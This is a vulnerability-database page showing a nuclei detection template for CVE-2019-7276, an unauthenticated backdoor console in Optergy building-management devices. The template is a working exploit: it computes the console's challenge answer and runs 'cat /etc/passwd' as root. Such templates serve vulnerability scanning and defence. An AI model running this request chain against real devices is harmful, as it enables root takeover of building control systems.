Lucene search
K

Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console

🗓️ 21 Jun 2026 03:03:41Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Optergy Proton/Enterprise exposes unauthenticated remote code execution via a backdoor console.

Related
Refs
Code
id: CVE-2019-7276

info:
  name: Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console
  author: daffainfo
  severity: critical
  description: |
    Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
  impact: |
    Unauthenticated attackers can exploit the backdoor console to execute arbitrary system commands with root privileges, leading to complete device compromise and control over building management systems.
  remediation: |
    Apply vendor-provided firmware updates or disable the affected console feature if possible.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7276
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.rb
    - https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276
    - https://www.zeroscience.mk/files/ioybms_gk_2019.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7276
    epss-score: 0.93384
    epss-percentile: 0.99825
    cpe: cpe:2.3:a:optergy:enterprise:*:*:*:*:*:*:*:*, cpe:2.3:a:optergy:proton:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: optergy
    product: enterprise,proton
    shodan-query: html:"Optergy"
  tags: cve,cve2019,optergy,proton,backdoor,rce,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /tools/ajax/ConsoleResult.html?get HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: challenge
        json:
          - '.response.message'
        internal: true

  - raw:
      - |
        POST /tools/ajax/ConsoleResult.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        command=cat /etc/passwd&challenge={{challenge}}&answer={{ sha1(challenge) + md5(sha1(challenge)) }}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c35d17998e5b0dab295b9cfd292dc7b1de0e04079bfd3d5bde255c7559389ace022100f26ee72fb5e37f2e29fb1819e4474b881a5c4b6aa3d6a109ff35796ea6e0d69b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 39.8
CVSS 210
EPSS0.93384
15